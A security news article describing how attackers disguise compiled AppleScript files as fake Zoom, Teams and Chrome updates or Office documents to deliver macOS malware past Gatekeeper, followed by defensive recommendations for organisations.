AppleScript Abused to Spread Fake Zoom and Teams macOS Updates

Security researchers have uncovered a new attack vector leveraging AppleScript (.scpt) files to deliver malware disguised as legitimate software updates, including fake Zoom, Microsoft Teams, and Chrome installers. 

This method highlights a growing threat to macOS users as cybercriminals weaponize native scripting tools to evade Apple’s Gatekeeper security mechanisms.

From Right-Click Bypass to .SCPT: The Evolution of macOS Malware

In 2024, Apple removed a widely abused infection vector: the right-click and open Gatekeeper override. 

Since then, attackers have shifted toward using compiled AppleScript (.scpt) files as delivery vehicles for malware. 

These files open directly in Script Editor.app, a legitimate macOS application that provides a user-friendly interface for executing scripts.

When victims double-click these malicious files, they are presented with an interface that looks benign — often framed as part of an “update” or “installation” process. 

Social engineering prompts encourage users to click “Run” or press Command + R, unintentionally executing the embedded malicious code. 

Researchers discovered that even when such files are quarantined by Gatekeeper, users can still manually execute them, effectively bypassing built-in protections.

AppleScript Obfuscation: Hiding Payloads in Plain Sight

These AppleScript-based attacks rely on a layered blend of social engineering, platform behavior, and deliberate obfuscation to trick users into executing code that appears benign.

Attackers craft files with familiar update- or installer-style names (for example, variants that reference Teams, Zoom, or Chrome) and often embed convincing branding and custom file icons so the item looks like an ordinary updater or document when viewed in Finder.

Because macOS opens .scpt files in Script Editor by default, a double-click exposes a graphical interface with Run controls, which is what a user would expect to see.

To hide the malicious payload from cursory inspection, threat actors bury the active commands far down in the script text, separated by long runs of blank lines or nonfunctional comments. 

In compiled AppleScript samples the payload can be even harder to inspect because the file is not plain text, so casual viewers and many automated scanners won’t easily surface the embedded behavior. 

When the user presses “Run” (or the keyboard shortcut), the visible update prompt is displayed while the script quietly performs background actions — for example, opening remote URLs, launching downloaders, or invoking system commands — without additional visible alerts.

The background activity is designed to feel legitimate: a plausible update dialog distracts the user while network requests retrieve follow-on payloads from attacker-controlled hosting. 

Those remote resources then deliver the actual malware payloads (stealers, RATs, or installers) which the script stages and executes. 

Because these actions are performed by a standard macOS app (Script Editor) and often by user-initiated interaction, they can circumvent Gatekeeper quarantine protections and evade simple signature-based detection.

Many of the .scpt samples register zero detections on scanning services, giving attackers a valuable window of operational freedom.

Delivery is straightforward and effective — phishing emails, malicious web pages posing as update notices, or compromised download sites distribute the .scpt files inside ZIPs or DMGs that preserve custom icons and resource forks, increasing the illusion of legitimacy.

Once executed, the chain can lead to persistence mechanisms, credential theft, and lateral movement — all while appearing to be nothing more than a routine update prompt to the victim.

Fake Icons and Names: The New macOS Deception

Beyond clever scripting, attackers use custom icons and naming conventions to disguise AppleScript files as common document formats. 

Samples have been identified with names like Stable1 Investment Proposal (Draft).pptx.scpt and AM Management Strategic Collaboration.docx.scpt. 

On macOS, these files display convincing Word or PowerPoint icons, making them nearly indistinguishable from legitimate documents.

Additionally, when bundled within .zip or .dmg (disk image) files, macOS preserves the embedded resource fork containing the fake icon, ensuring the deception persists once extracted or mounted. 

This tactic aligns with prior “drag-and-drop to Terminal” malware delivery techniques but with a lower barrier to execution — simply double-clicking the file is enough to trigger infection.

Building Resilience Against AppleScript-Based Attacks

As AppleScript is exploited to deliver disguised macOS malware, organizations must adopt a layered defense strategy that combines technical controls with user awareness.

• Restrict AppleScript execution by changing default file behavior, enforcing code-signing and notarization policies, and limiting automation permissions in macOS settings.
• Implement endpoint detection and response (EDR) or extended detection and response (XDR) tools that monitor for unusual Script Editor or osascript activity and suspicious process chains.
• Educate users about the risks of executing unfamiliar AppleScript files or fake updates, and reinforce awareness through ongoing phishing and social engineering training.
• Verify all software updates through official or managed distribution channels, using code-signing validation to confirm installer authenticity before installation.
• Apply application allowlisting, network filtering, and DNS security controls to block unverified scripts, malicious domains, and unauthorized network activity.
• Establish clear incident response procedures, maintain secure offline and immutable backups, and use threat intelligence.

By combining system hardening, continuous monitoring, and informed user behavior, organizations can reduce the likelihood of successful AppleScript-based compromises and build cyber resilience. 

The New macOS Threat Trend

The rise of AppleScript-based malware delivery reflects a broader shift in macOS attack strategies — from exploiting vulnerabilities to abusing legitimate system features. 

As attackers increasingly blend social engineering with trusted automation tools, traditional defenses alone are no longer sufficient. 

This growing abuse of legitimate macOS features underscores why adopting a zero-trust approach — where every action, user, and process must be verified — has become essential.